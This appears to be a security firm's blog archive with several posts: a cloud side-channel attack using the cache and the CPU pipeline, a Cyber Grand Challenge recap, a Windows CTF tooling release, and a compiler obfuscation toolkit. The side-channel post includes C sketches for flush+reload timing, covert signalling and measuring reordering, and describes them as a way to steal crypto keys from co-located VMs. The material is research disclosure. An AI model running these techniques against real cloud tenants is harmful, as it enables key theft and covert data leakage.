Hardware Side Channels in the Cloud

At REcon 2015, I demonstrated a new hardware side channel that targets co-located virtual machines in the cloud. This attack exploits the CPU’s pipeline, as opposed to the cache tiers often used in side channel attacks. When designing or looking for hardware-based side channels – specifically in the cloud – I analyzed a few universal properties that define the ‘right’ kind of vulnerable system, as well as properties unique to the hardware medium.

Slides and full research paper found here.

The relevance of side channel attacks will only increase, especially attacks that target the vulnerabilities inherent to systems which share hardware resources – such as cloud platforms.

Virtualization of Physical Resources

Figure 1: virtualization of physical resources


Any meaningful information that you can leak from the environment running the target application – or, in this case, the victim virtual machine – counts as a side channel. However, some information is better than others. In this case, a process (the attacker) must be able to repeatedly record an environment ‘artifact’ from inside one virtual machine.

In the cloud, these environment artifacts are the shared physical resources used by the virtual machines. The hypervisor dynamically partitions each resource and this is then seen by a single virtual machine as its private resource. The side channel model (Figure 2) illustrates this.

Knowing this, the attacker can affect that resource partition in a recordable way, such as by flushing a line in the cache tier, waiting until the victim process uses it for an operation, then requesting that address again – timing the access to learn whether the victim touched it.
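As a minimal sketch of that cache technique (flush+reload), assuming x86 with GCC or Clang and an address shared with the victim – the cycle threshold is machine-specific and must be calibrated:

#include <stdint.h>
#include <x86intrin.h>  /* _mm_clflush, _mm_lfence, __rdtscp */

/* Time a single load of addr, in cycles. */
static uint64_t time_load(uint8_t *addr) {
    unsigned aux;
    uint64_t start = __rdtscp(&aux);
    (void)*(volatile uint8_t *)addr;   /* the probed load */
    _mm_lfence();                      /* wait for the load to finish */
    return __rdtscp(&aux) - start;
}

/* One flush+reload round: returns 1 if the line reloads quickly,
   i.e. the victim touched it between our flush and our reload. */
static int victim_touched(uint8_t *shared, uint64_t threshold) {
    _mm_clflush(shared);               /* 1. flush the line out of cache */
    /* 2. wait for the victim to (possibly) use the address ... */
    return time_load(shared) < threshold;  /* 3. reload and time it */
}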

Figure 2: side channel model


Great! So we can record things from our victim’s environment – but now what? Depending on what the victim’s process is doing we can actually employ several different types of attacks.

1. crypto key theft

Crypto keys are great; private crypto keys are even better. Using this hardware side channel, it’s possible to leak the bytes of a private key used by a co-located process. In one scenario, two virtual machines are allocated the same space in the L3 cache at different times. The attacker flushes a certain cache address, waits for the victim to use that address, then probes it again – timing the access to learn what the victim did [1].

2. process monitoring ( what applications is the victim running? )

This is possible when you record enough of the target’s behavior, i.e. CPU or pipeline usage or values stored in memory. A mapping between the recordings and specific running processes can then be constructed with varying degrees of certainty. Warning: this does rely on at least a rudimentary knowledge of machine learning.

3. environment keying ( great for proving co-location! )

Using the environment recordings taken off of a specific hardware resource, you can also uniquely identify one server from another in the cloud. This is useful to prove that two virtual machines you control are co-resident on the same physical server. Alternatively, if you know the behavior signature of a server your target is on, you can repeatedly create virtual machines, recording the behavior on each system until you find a match [2].

4. broadcast signal ( receive messages without the internet :0 )

If a colluding process purposefully generates behavior on a pre-arranged hardware resource, such as filling a cache line with 0’s and 1’s, the attacker (your process) can record this behavior the same way it would record a victim’s behavior. You can then translate the recorded values into pre-agreed messages. Recording from different hardware media results in channels with different bandwidths [3].
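A sketch of the receiving side, assuming a pre-agreed slot length and a calibrated probe of the shared line like the flush+reload routine above (probe and the slot length are hypothetical stand-ins):

#include <unistd.h>

/* probe() stands in for a calibrated flush+reload of the pre-arranged
   line: it returns 1 if the sender touched the line this time slot. */
extern int probe(void);

#define SLOT_US 10000   /* pre-agreed slot length (hypothetical) */

static void receive_bits(char *out, int nbits) {
    for (int i = 0; i < nbits; i++) {
        out[i] = probe() ? '1' : '0';  /* cached line in this slot = 1 */
        usleep(SLOT_US);               /* advance to the next slot */
    }
}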

The Cache is Easy, the Pipeline is Harder

All of the above examples used the cache to record the environment shared by victim and attacker processes. The cache is the most widely used resource for constructing side channels, in both literature and practice, and the easiest to record artifacts from. Basically, everyone loves cache.

The cache isn’t the only shared resource, however: co-located virtual machines also share the CPU execution pipeline. In order to use the CPU pipeline, we must be able to record a value from it. However, there is no easy way for any process to query the state of the pipeline over time – it is like a virtual black box. The only things a process can know are the order of the instructions it submits to the pipeline and the results the pipeline returns.

out-of-order execution

( the pipeline’s artifact )

We can exploit this pipeline optimization as a means to record the state of the pipeline. A known input instruction order will produce one of two different return values: the expected result(s), or the result produced if the pipeline executes the instructions out-of-order.

Figure 3: foreign processes can share the same pipeline

strong memory ordering

Our target, cloud processors, can be assumed to be x86/64 architecture – implying a usually strongly-ordered memory model [4]. This is important because the pipeline will optimize the execution of instructions but attempt to maintain the right order of stores to memory and loads from memory.

…HOWEVER, the stores and loads from different threads may be reordered by out-of-order execution. This reordering is observable if we’re clever.

recording instruction reorder ( or how to be clever )

In order for the attacker to record the “reordering” artifact from the pipeline, we must record two things for each of our two threads:

  • input instruction order
  • return value

Additionally, the instructions in each thread must contain a STORE to memory and a LOAD from memory, and each LOAD must reference the location stored to by the opposite thread. This setup makes possible the four cases illustrated below. The last is the artifact we record – doing so several thousand times gives us averages over time.

Figure 4: the attacker can record when its instructions are reordered
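A minimal sketch of this recording loop, assuming Linux with pthreads on x86: each thread STOREs to one shared location and LOADs the other, and an iteration where both LOADs return 0 is the fourth case – an observed reordering (compile with -pthread):

#include <pthread.h>
#include <stdio.h>

/* Shared locations: each thread STOREs to one and LOADs the other. */
static volatile int X, Y, r1, r2;
static pthread_barrier_t go, done;

static void *thread1(void *arg) {
    (void)arg;
    for (;;) {
        pthread_barrier_wait(&go);
        X = 1;        /* STORE to our location */
        r1 = Y;       /* LOAD of the other thread's location */
        pthread_barrier_wait(&done);
    }
    return NULL;
}

static void *thread2(void *arg) {
    (void)arg;
    for (;;) {
        pthread_barrier_wait(&go);
        Y = 1;        /* STORE */
        r2 = X;       /* LOAD */
        pthread_barrier_wait(&done);
    }
    return NULL;
}

int main(void) {
    pthread_t a, b;
    int reorders = 0, iters = 100000;
    pthread_barrier_init(&go, NULL, 3);
    pthread_barrier_init(&done, NULL, 3);
    pthread_create(&a, NULL, thread1, NULL);
    pthread_create(&b, NULL, thread2, NULL);
    for (int i = 0; i < iters; i++) {
        X = Y = 0;                     /* reset while threads are parked */
        pthread_barrier_wait(&go);     /* release both threads */
        pthread_barrier_wait(&done);   /* wait for both results */
        if (r1 == 0 && r2 == 0)        /* case four: neither LOAD saw */
            reorders++;                /* the other STORE - reordered */
    }
    printf("%d of %d iterations reordered\n", reorders, iters);
    return 0;
}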

sending a message

To make our attacks more interesting, we want to be able to force the number of recorded out-of-order executions. This ability is useful for other attacks, such as constructing covert communication channels.

In order to do this, we need to alter how the pipeline’s optimization works – by increasing the probability that it either will or will not reorder our two threads. The easiest approach is to enforce a strong memory order, guaranteeing that the attacker will observe fewer out-of-order executions.

memory barriers

In the x86 instruction set, there are specific barrier instructions that stop the processor from reordering the four possible combinations of STOREs and LOADs. What we’re interested in is forcing a strong order when the processor encounters an instruction sequence with a STORE followed by a LOAD.

The instruction mfence does exactly this.

By having the colluding process inject these memory barriers into the pipeline, the attacker’s instructions will not be reordered, forcing a noticeable decrease in the recorded averages. Doing this in distinct time frames allows us to send a binary message.

Figure 5: mfence ensures the strong memory order on pipeline
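Returning to the litmus-test sketch above, the colluding sender only needs to drop an mfence between its STORE and its LOAD to suppress the reordering during a pre-arranged time frame (GCC/Clang inline assembly, reusing the globals from that sketch):

/* Fenced variant of a litmus-test thread body: the mfence forbids the
   STORE/LOAD pair from being reordered, so while the sender runs this
   version the receiver's measured reorder rate visibly drops - one
   bit per agreed time frame. */
static void *thread1_fenced(void *arg) {
    (void)arg;
    for (;;) {
        pthread_barrier_wait(&go);
        X = 1;                                        /* STORE */
        __asm__ __volatile__("mfence" ::: "memory");  /* barrier */
        r1 = Y;                                       /* LOAD */
        pthread_barrier_wait(&done);
    }
    return NULL;
}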


The takeaway: even with virtualization separating your virtual machine from the hundreds of other alien virtual machines, the pipeline can’t distinguish your process’s instructions from all the others – and we can use that to our advantage. :0

If you would like to learn more about this side channel technique, please read the full paper here.

  1. https://eprint.iacr.org/2013/448.pdf
  2. http://www.ieee-security.org/TC/SP2011/PAPERS/2011/paper020.pdf
  3. https://www.cs.unc.edu/~reiter/papers/2014/CCS1.pdf
  4. http://preshing.com/20120930/weak-vs-strong-memory-models/

How We Fared in the Cyber Grand Challenge

The Cyber Grand Challenge qualifying event was held on June 3rd, at exactly noon Eastern time. At that instant, our Cyber Reasoning System (CRS) was given 131 purposely built insecure programs. During the following 24-hour period, our CRS was able to identify vulnerabilities in 65 of those programs and rewrite 94 of them to eliminate bugs built into their code. This proves, without a doubt, that automating the actions of a talented software auditor is not only possible but practical.

Despite the success of our CRS at finding and patching vulnerabilities, we did not qualify for the final event, to be held next year. There was a fatal flaw that lowered our overall score to 9th, below the 7th place threshold for qualification. In this blog post we’ll discuss how our CRS works, how it performed against competitor systems, what doomed its score, and what we are going to do next.

Cyber Grand Challenge Background

The goal of the Cyber Grand Challenge (CGC) is to combine the speed and scale of automation with the reasoning capabilities of human experts. Multiple teams create Cyber Reasoning Systems (CRSs) that autonomously reason about arbitrary networked programs, prove the existence of flaws in those programs, and automatically formulate effective defenses against those flaws. How well these systems work is evaluated through head-to-head tournament-style competition.

The competition has two main events: the qualifying event and the final event. The qualifying event was held on June 3, 2015. The final event is set to take place during August 2016. Only the top 7 competitors from the qualifying event proceed to the final event.

During the qualifying event, each competitor was given the same 131 challenges, or purposely built vulnerable programs, each of which contained at least one intentional vulnerability. For 24 hours, the competing CRSes faced off against each other and were scored according to four criteria. The full details are in the CGC Rules, but here’s a quick summary:

  • The CRS had to work without human intervention. Any teams found to use human assistance were disqualified.
  • The CRS had to patch bugs in challenges. Points were gained for every bug successfully patched. Challenges with no patched bugs received zero points.
  • The CRS could prove bugs exist in challenges. The points from patched challenges were doubled if the CRS could generate an input that crashed the challenge.
  • The patched challenges had to function and perform almost as well as the originals. Points were lost based on performance and functionality loss in the patched challenges.

A spreadsheet with all the qualifying event scores and other data used to make the graphs in this post is available from DARPA (Trail of Bits is the ninth place team). With the scoring in mind, let’s review the Trail of Bits CRS architecture and the design decisions we made.


We’re a small company with a distributed workforce, so we couldn’t physically host a lot of servers. Naturally, we went with cloud computing to do processing; specifically, Amazon EC2. Those who saw our tweets know we used a lot of EC2 time. Most of that usage was purely out of caution.

We didn’t know how many challenges would be in the qualifying event — just that it would be “more than 100.” We prepared for a thousand, with each accompanied by multi-gigabyte network traffic captures. We were also terrified of an EC2 region-wide failure, so we provisioned three different CRS instances, one in each US-based EC2 region, affectionately named Biggie (us-east-1), Tupac (us-west-2), and Dre (us-west-1).

It turns out that there were only 131 challenges and no gigantic network captures in the qualifying event. During the qualifying event, all EC2 regions worked normally. We could have comfortably done the qualifying event with 17 c4.8xlarge EC2 instances, but instead we used 297. Out of our abundance of caution, we over-provisioned by a factor of ~17x.

Bug Finding

The Trail of Bits CRS was ranked second by the number of verified bugs found (Figure 1). This result is impressive considering that we started with nothing while several other teams already had existing bug finding systems prior to CGC.

Figure 1: Teams in the qualifying event ranked by number of bugs found. Orange bars signify finalists.

Our CRS used a multi-pronged strategy to find bugs (Figure 2). First, there was fuzzing. Our fuzzer is implemented with a custom dynamic binary translator (DBT) capable of running several 32-bit challenges in a single 64-bit address space. This is ideal for challenges that feature multiple binaries communicating with one another. The fuzzer’s instrumentation and mutation are separated, allowing for pluggable mutation strategies. The DBT framework can also snapshot binaries at any point during execution. This greatly improves fuzzing speed, since it’s possible to avoid replaying previous inputs when exploring new input space.

Figure 2: Our bug finding architecture. It is a feedback-based architecture that explores the state space of a program using fuzzing and symbolic execution.

In addition to fuzzing, we had not one but two symbolic execution engines. The first operated on the original unmodified binaries, and the second operated on the translated LLVM from mcsema. Each symbolic execution engine had its own strengths, and both contributed to bug finding.

The fuzzer and symbolic execution engines operate in a feedback loop mediated by a system we call MinSet. The MinSet uses branch coverage to maintain a minimum set of maximal coverage inputs. The inputs come from any source capable of generating them: PCAPs, fuzzing, symbolic execution, etc. Every tool gets original inputs from MinSet, and feeds any newly generated inputs into MinSet. This feedback loop lets us explore the possible input state space with both fuzzers and symbolic execution in parallel. In practice this is very effective. We log the provenance of our crashes, and most of them look something like:

Network Capture ⇒ Fuzzer ⇒ SymEx1 ⇒ Fuzzer ⇒ Crash
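The post doesn’t spell out MinSet’s algorithm beyond branch coverage, but a greedy approximation of the idea looks something like this sketch, where run_target and the bitmap size are hypothetical stand-ins for the instrumentation:

#include <stddef.h>
#include <stdint.h>

#define MAP_SIZE 65536   /* size of the branch-coverage bitmap (assumed) */

/* Union of all branch-coverage bits seen across the kept corpus. */
static uint8_t seen[MAP_SIZE];

/* Stand-in: execute one input under instrumentation and fill cov[]
   with the branches it covered. */
extern void run_target(const uint8_t *input, size_t len,
                       uint8_t cov[MAP_SIZE]);

/* Keep an input only if it covers some branch no kept input covers;
   every tool pulls inputs from the kept set and feeds new ones back
   through this gate. */
static int minset_accept(const uint8_t *input, size_t len) {
    uint8_t cov[MAP_SIZE] = {0};
    int new_bits = 0;
    run_target(input, len, cov);
    for (size_t i = 0; i < MAP_SIZE; i++) {
        if (cov[i] & ~seen[i]) {       /* covers a never-seen branch */
            seen[i] |= cov[i];
            new_bits = 1;
        }
    }
    return new_bits;
}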

Some bugs can only be triggered when the input replays a previous nonce, which would be different on every execution of the challenge. Our bug finding system can produce inputs that contain variables based on program outputs, enabling our CRS to handle such cases.

Additionally, our symbolic executors are able to identify which inputs affect program state at the point of a crash. This is a key requirement for the success of any team competing in the final event, as it enables the CRS to create a more controlled crash.


Patching

Our CRS’s patching effectiveness, as measured by the security score, ranks fourth (Figure 3).

Figure 3: Teams in the qualifying event ranked by patch effectiveness (security score). Orange bars signify finalists.

Our CRS patches bugs by translating challenges into LLVM bitcode with mcsema. Patches are applied to the LLVM bitcode, optimized, and then converted back into executable code. The actual patching works by gracefully terminating the challenge when invalid memory accesses are detected. Patching the LLVM bitcode representation of challenges provides us with enormous power and flexibility:

  • We can easily validate any memory access and keep track of all memory allocations.
  • Complex algorithms, such as dataflow tracking, dominator trees, dead store elimination, loop detection, etc., are very simple to implement using the LLVM compiler infrastructure.
  • Our patching method can be used on real-world software, not just CGC challenges.

We created two main patching strategies: generic patching and bug-based patching. Generic patching is an exclusion-based strategy: it first assumes that every memory access must be verified, and then excludes accesses that are provably safe. The benefit of generic patching is that it patches all possible invalid memory accesses in a challenge. Bug-based patching is an inclusion-based strategy: it first assumes only one memory access (where the CRS found a bug) must be verified, and then includes nearby accesses that may be unsafe. Each patching strategy has multiple heuristics to determine which accesses should be included or excluded from verification.
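Conceptually, each access that a strategy decides to verify is rewritten along these lines; is_valid_access and gracefully_terminate are hypothetical stand-ins for the CRS’s allocation tracking and exit path, not its actual API:

#include <stddef.h>

/* Hypothetical stand-ins for the CRS's memory bookkeeping. */
extern int  is_valid_access(const void *p, size_t n);
extern void gracefully_terminate(void);

/* Before patching: an unchecked write at an attacker-influenced index. */
void store_unpatched(char *buf, size_t idx, char value) {
    buf[idx] = value;
}

/* After patching: the access is verified first; an invalid access
   gracefully terminates the challenge instead of corrupting memory.
   Generic patching guards every access not proven safe; bug-based
   patching guards only accesses near a discovered bug. */
void store_patched(char *buf, size_t idx, char value) {
    if (!is_valid_access(buf + idx, sizeof value))
        gracefully_terminate();
    buf[idx] = value;
}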

The inclusion and exclusion heuristics generate patched challenges with different security/performance tradeoffs. The patched challenges generated by these heuristics were tested for performance and security to determine which heuristic performed best while still fixing the bug. For the qualifying event, we evaluated both generic and bug-based patching, but ultimately chose a generic-only patching strategy. Bug-based patching was slightly more performant, but generic patching was more comprehensive and it patched bugs that our CRS couldn’t find.

Functionality and Performance

Functionality and performance scores combine to create an availability score. The availability score is used as a scaling factor for points gained by patching and bug finding. This scaling factor only matters for successfully patched challenges, since those are the only challenges that can score points. The following graphs only consider functionality and performance of successfully patched challenges.


Functionality

Out of the 94 challenges that our CRS successfully patched, 56 retained full functionality, 30 retained partial functionality, and 8 were nonfunctional. Of the top 10 teams in the qualifying event, our CRS ranks 5th in terms of fully functional patched challenges (Figure 4). We suspect our patched challenges lost functionality due to problems in mcsema, our x86-to-LLVM translator. We hope to verify and address these issues once DARPA open-sources the qualifying event challenges.

Figure 4: The count of perfectly functional, partially functional, and nonfunctional challenges submitted by each of the top 10 teams in the qualifying event. Orange bars signify finalists.


Performance

The performance of patched challenges is how our CRS snatched defeat from the jaws of victory. Of the top ten teams in the qualifying event, our CRS placed last in terms of patched-challenge performance (Figure 5).

Figure 5: Average and median performance scores of the top ten qualifying event participants. Orange bars signify finalists.

Our CRS produces slow binaries for two reasons: technical and operational. The technical reason is that performance of our patched challenges is an artifact of our patching process, which translates challenges into LLVM bitcode and then re-emits them as executable binaries. The operational reason is that our patching was developed late and optimized for the wrong performance measurements.

So, why did we optimize for the wrong performance measurements? The official CGC performance measurement tools were kept secret, because the organizers wanted to ensure that no one could cheat by gaming the performance measurements. Therefore, we had to measure performance ourselves, and our metrics showed that CPU overhead of our patched challenges was usually negligible. The main flaw that we observed was that our patched challenges used too much memory. Because of this, we spent time and effort optimizing our patching to use less memory in favor of using more CPU time.

It turns out we optimized for the wrong thing, because our self-measurement did not agree with the official measurement tools (Table 1). When self-measuring, our worst-performing patching method had a median CPU overhead of 33% and a median memory overhead of 69%. The official qualifying event measured us at 76% CPU overhead and 28% memory overhead. Clearly, our self-measurements were considerably different from official measurements.

Measurement                            Median CPU Overhead    Median Memory Overhead
Worst Self-Measured Patching Method    33%                    69%
Official Qualifying Event              76%                    28%

Table 1: Self-measured CPU and memory overhead compared with the official qualifying event measurements.

Our CRS measured its overall score with our own performance metrics. The self-measured score of our CRS was 106, which would have put us in second place. The real overall score was 21.36, putting us in ninth.

An important aspect of software development is choosing where to focus your efforts, and we chose poorly. CGC participants had access to the official measuring system during two scored events held during the year, one in December 2014 and one in April 2015. We should have evaluated our patching system thoroughly during both scored events. Unfortunately, our patching wasn’t fully operational until after the second scored event, so we had no way to verify the accuracy of our self-measurement. The performance penalty of our patching isn’t a fundamental issue. Had we known how bad it was, we would have fixed it. However, according to our own measurements the patching was acceptable so we focused efforts elsewhere.

What’s Next?

According to the CGC FAQ (Question 46), teams are allowed to combine after the qualifying event. We hope to join forces with another team that qualified for the CGC final event, and use the best of both our technologies to win. The technology behind our CRS will provide a significant advantage to any team that partners with us. If you would like to discuss a potential partnership for the CGC final, please contact us at cgc@trailofbits.com.

If we cannot find a partner for the CGC final, we will focus our efforts on adapting our CRS to automatically find and patch vulnerabilities in real software. Our system is up to the task: it has already proven that it can find bugs, and all of its core components were derived from software that works on real Linux binaries. Several components even have Windows and 64-bit support, and adding support for other platforms is a possibility. If you are interested in commercial applications of our technology, please get in touch with us at cgc@trailofbits.com.

Finally, we plan to contribute back fixes and updates to the open source projects utilized in our CRS. We used numerous open source projects during development, and have made several custom fixes and modifications. We look forward to contributing these back to the community so that everyone benefits from our improvements.

Closing the Windows Gap

The security research community is full of grey beards who earned their stripes writing exploits against mail servers, domain controllers, and TCP/IP stacks. These researchers started writing exploits on platforms like Solaris, IRIX, and BSDi before moving on to Windows exploitation. Now they run companies, write policy, rant on Twitter, and testify in front of Congress. I’m not one of those people; my education in security started after Windows Vista and then expanded through Capture the Flag competitions when real-world research got harder. Security researchers entering the industry post-2010 [1] learn almost exclusively via Capture the Flag competitions.

Occasionally, I’ll try to talk a grey beard into playing capture the flag. It’s like trying to explain Pokemon to adults. Normally such endeavors are an exercise in futility; however, on a rare occasion they’ll get excited and agree to try it out! They then get frustrated and stuck on the same problems I do – it’s fantastic for my ego [2].

“Ugh, it’s 90s shellcoding problems applied today.”
— muttered during DEFCON 22 CTF Quals

Following a particularly frustrating CTF, we discussed the challenges and why there are so few Windows challenges despite Windows being such an important part of our industry. Only the Russian CTFs release Windows challenges; none of the large American CTFs do.

Much like Cold War-era politics, the Russian CTFs have edged out a Windows superiority – a Windows gap.

Projected magnitude of the Windows gap

The Windows gap exists outside of CTF as well. Over the past few years the best Windows security research has come out of Russia [3] and China. So, why are the Russians and Chinese so good at Windows? Well, because they actually use Windows…and for some reason western security researchers don’t.

Let’s close this Windows gap. Windows knowledge is important for our industry.

Helping the CTF community

If Capture the Flag competitions are how today’s greenhorns cut their teeth, we should have more Windows-based challenges and competitions. To facilitate this, Trail of Bits is releasing AppJailLauncher, a framework for making exploitable Windows challenges!

This man knows Windows and thinks you should too.

As a contest organizer, securing your infrastructure is the biggest priority, and securing Windows services was always a bit tricky until Windows 8 introduced AppContainers. AppJailLauncher uses AppContainers to keep everything nice and secure from griefers. The repository includes everything you need to isolate a Windows TCP service from the rest of the operating system.

Additionally, we’re releasing the source code to greenhornd, a 2014 CSAW challenge I wrote to introduce people to Windows exploitation and the best debugger yet developed: WinDbg. The repository includes the binary as released, deployment directions, and a proof-of-vulnerability script.

We’re hoping to help drag the CTF community kicking and screaming into Windows expertise.

Windows Reactions

Releasing a Windows challenge last year at CSAW was very entertaining. There was plenty of complaining [4]:

<dwn> how is this windows challenge only 200 points omg
<dwn> making the vuln obvious doesn’t make windows exploitation any easier ;_;

<mserrano> RyanWithZombies: dude but its fuckin windows
<mserrano> even I don’t use windows anymore
<@RyanWithZombies> i warned you guys for months
<mserrano> also man windows too hard

<geohot> omg windows
<geohot> is so hard
<geohot> will do tomorrow
<geohot> i don’t have windows vm

<ebeip90> zomg a windows challenge
<ebeip90> <3
[ hours later ]
<ebeip90> remember that part a long time ago when I said “Oh yay, a Windows challenge”?

<ricky> Windows is hard
<miton> ^

Some praise:

<cai_> i liked your windows one btw :)

<MMavipc> RyanWithZombies pls more windows pwning/rce

<CTFBroforce> I was so confused I have never done a windows exploit
<CTFBroforce> this challenge is going to make me look into windows exploits
<CTFBroforce> I dont know how to write windows shell code

<spq> thx for the help and the force to exploit windows with shellcode for the first time :)

It even caused some arguments among competitors:

<clockish> dudes, shut up, windows is hard
<MMavipc> windows is easy
<MMavipc> linux is hard

We hope AppJailLauncher will be used to elicit more passionate responses over the next few years!

  1. Many of the most popular CTFs started in 2010 and 2011: Ghost in the Shellcode (2010), RuCTFe (2010), PlaidCTF (2011), Codegate (2011), PHDays (2011). Very few predate 2010.
  2. Much like watching geohot fail at format string exploitation during a LiveCTF broadcast: https://www.youtube.com/watch?v=td1KEUhlSuk
  3. Try searching for obscure Windows kernel symbols, you’ll end up on a Russian forum.
  4. The names have not been changed to shame the enablers.

ReMASTering Applications by Obfuscating during Compilation

In this post, we discuss the creation of a novel software obfuscation toolkit, MAST, implemented in the LLVM compiler and suitable for denying program understanding to even the most well-resourced adversary. Our implementation is inspired by effective obfuscation techniques used by nation-state malware and techniques discussed in academic literature. MAST enables software developers to protect applications with technology developed for offense.

MAST is a product of Cyber Fast Track, and we would like to thank Mudge and DARPA for funding our work. This project would not have been possible without their support. MAST is now a commercial product offering of Trail of Bits and companies interested in licensing it for their own use should contact info@trailofbits.com.


There are a lot of risks in releasing software these days. Once upon a time, reverse engineering software presented a challenge best solved by experienced and skilled reverse engineers at great expense. It was worthwhile for reasonably well-funded groups to reverse engineer and recreate proprietary technology or for clever but bored people to generate party tricks. Despite the latter type of people causing all kinds of mild internet havoc, reverse engineering wasn’t widely considered a serious threat until relatively recently.

Over time, however, the stakes have risen: criminal entities, corporations, even nation-states have become extremely interested in software vulnerabilities. These entities seek either to defend their own networks, applications, and users, or to attack someone else’s. Historically, software obfuscation was a concern of the “good guys”, who were interested in protecting their intellectual property. It wasn’t long before malicious entities began obfuscating their own tools to protect them from analysis once captured.

A recent example of successful obfuscation is that used by the authors of the Gauss malware; several days after discovering the malware, Kaspersky Lab, a respected malware analysis lab and antivirus company, posted a public plea for assistance in decrypting a portion of the code. That even a company of professionals had trouble enough to ask for outside help is telling: obfuscation can be very effective. Professional researchers have been unable to deobfuscate Gauss to this day.


With all of this in mind, we were inspired by Gauss to create a software protection system that leapfrogs available analysis technology. Could we repurpose techniques from software exploitation and malware obfuscation into a state-of-the-art software protection system? Our team is quite familiar with publicly available tools for assisting in reverse engineering tasks and considered how to significantly reduce their efficacy, if not deny it altogether.

Software developers seek to protect varying classes of information within a program. Our system must account for each with equal levels of protection to satisfy these potential use cases:

  • Algorithms: adversary knowledge of proprietary technology
  • Data: knowledge of proprietary data (the company’s or the user’s)
  • Vulnerabilities: knowledge of vulnerabilities within the program

In order for the software protection system to be useful to developers, it must be:

  • Easy to use: the obfuscation should be transparent to our development process, not alter or interfere with it. No annotations should be necessary, though we may want them in certain cases.
  • Cross-platform: the obfuscation should apply uniformly to all applications and frameworks that we use, including mobile or embedded devices that may run on different processor architectures.
  • Protect against state-of-the-art analysis: our obfuscation should leapfrog available static analysis tools and techniques and require novel research advances to see through.

Finally, we assume an attacker will have access to the static program image; many software applications are going to be directly accessible to a dedicated attacker. For example, an attacker interested in a mobile application, anti-virus signatures, or software patches will have the static program image to study.

Our Approach

We decided to focus primarily on preventing static analysis; in this day and age there are a lot of tools that can be run statically over application binaries to gain information with little work or time required of the attacker, and many attackers are proficient in generating their own situation-specific tools. Static tools can often be run very quickly over large amounts of code without requiring an environment in which to execute the target binary.

We decided on a group of techniques that compose together, comprising opaque predicate insertion, code diffusion, and – because our original scope was iOS applications – mangling of Objective-C symbols. These make the protected application impossible to understand without environmental data and impossible to analyze with current static analysis tools due to alias analysis limitations, and they deny the effectiveness of breakpoints, method name retrieval scripts, and other common reversing techniques. In combination, these techniques attack a reverse engineer’s workflow and tools from all sides.

Further, we did all of our obfuscation work inside of a compiler (LLVM) because we wanted our technology to be thoroughly baked into the entire program. LLVM can use knowledge of the program to generate realistic opaque predicates or hide diffused code inside of false paths not taken, forcing a reverse engineer to consult the program’s environment (which might not be available) to resolve which instruction sequences are the correct ones. Obfuscating at the compiler level is more reliable than operating on an existing binary: there is no confusion about code vs. data or missing critical application behavior. Additionally, compiler-level obfuscation is transparent to current and future development tools based on LLVM. For instance, MAST could obfuscate Swift on the day of release — directly from the Xcode IDE.

Symbol Mangling

The first and simplest technique was to hinder quick Objective-C method name retrieval scripts; this is certainly the least interesting of the transforms, but would remove a large amount of human-readable information from an iOS application. Without method or other symbol names present for the proprietary code, it’s more difficult to make sense of the program at a glance.

Opaque Predicate Insertion

The second technique we applied, opaque predicate insertion, is not a new technique. It’s been done before in numerous ways, and capable analysts have developed ways around many of the common implementations. We created a stronger version of predicate insertion by inserting predicates with opaque conditions and alternate branches that look realistic to a script or person skimming the code. Realistic predicates significantly slow down a human analyst, and also slow down tools that operate on program control flow graphs (CFGs) by ballooning the graph to be much larger than the original. Increased CFG size impacts the size of the program and its execution speed, but our testing indicates the impact is smaller than or consistent with similar tools.
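MAST derives its predicates from knowledge of the program, so the following is only a generic, textbook-style illustration of the concept: the condition is always true – x*(x+1) is always even, even with unsigned wraparound – but that fact isn’t obvious to a skim or to a CFG-based tool, and the dead branch looks plausible:

#include <stdint.h>

/* Always true: one of x and x+1 is even, and wraparound mod 2^32
   preserves evenness - but this is not obvious at a glance. */
static int opaquely_true(uint32_t x) {
    return (x * (x + 1)) % 2 == 0;
}

int protected_op(uint32_t seed, int a, int b) {
    if (opaquely_true(seed)) {
        return a + b;              /* the real computation */
    }
    /* Dead decoy branch: never executed, but it balloons the CFG and
       gives the obfuscator a place to hide diffused code. */
    return (a ^ b) - (int)seed;
}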

Code Diffusion

The third technique, code diffusion, is by far the most interesting. We took the ideas of Return-Oriented Programming (ROP) and applied them in a defensive manner.

In a straightforward situation, an attacker exploits a vulnerability in an application and supplies their own code for the target to execute (shellcode). However, since the introduction of non-executable data mitigations like DEP and NX, attackers have had to find ways to execute malicious code without introducing anything new. ROP is a technique that makes use of code that is already present in the application. Usually, an attacker catalogs a set of short “gadgets” in the existing program text that each perform a simple task, and then links those together, jumping from one to the other, to build up the functionality required for their exploit – effectively creating a new program by jumping around in the existing one.

We transform application code such that it jumps around in a ROP-like way, scrambling the program’s control flow graph into disparate units. However, unlike ROP, where attackers are limited by the gadgets they can find and their ability to predict their location at runtime, we precisely control the placement of gadgets during compilation. For example, we can store gadgets in the bogus programs inserted during the opaque predicate obfuscation. After applying this technique, reverse engineers will immediately notice that the handy graph is gone from tools like IDA. Further, this transformation will make it impossible to use state-of-the-art static analysis tools, like BAP, and impedes dynamic analysis techniques that rely on concrete execution with a debugger. Code diffusion destroys the semantic value of breakpoints, because a single code snippet may be re-used by many different functions and not used by other instances of the same function.

Native code before obfuscation with MAST: the graph view is useful

Native code after obfuscation with MAST: the graph view is useless

The figures above demonstrate a very simple function before and after the code diffusion transform, using screenshots from IDA. In the first figure, there is a complete control flow graph; in the second, however, the first basic block no longer jumps directly to either of the following blocks; instead, it must refer at runtime to a data section elsewhere in the application before it knows where to jump in either case. Running this code diffusion transform over an entire application reduces the entire program from a set of connected-graph functions to a much larger set of single-basic-block “functions.”
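As a toy illustration of the effect (not MAST’s actual implementation), here is straight-line control flow rewritten so that each block looks up its successor in a data table populated at runtime; a static disassembler sees no direct edges between the blocks:

#include <stdio.h>

typedef int (*block_fn)(int);

/* Successor table: in an obfuscated binary this data would live far
   from the code and could be derived from the execution environment. */
static block_fn successor[3];

static int block_exit(int v) { return v; }
static int block_b(int v) { v *= 2; return successor[2](v); }
static int block_a(int v) { v += 1; return successor[1](v); }

int main(void) {
    /* Populate the table at runtime, so the jump targets are not
       visible to static analysis of the code section. */
    successor[0] = block_a;
    successor[1] = block_b;
    successor[2] = block_exit;
    printf("%d\n", successor[0](20));   /* (20 + 1) * 2 = 42 */
    return 0;
}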

Code diffusion has a noticeable performance impact on whole-program obfuscation. In our testing, we compared the speed of bzip2 before and after our return-oriented transformation and slowdown was approximately 55% (on x86).

Environmental Keying

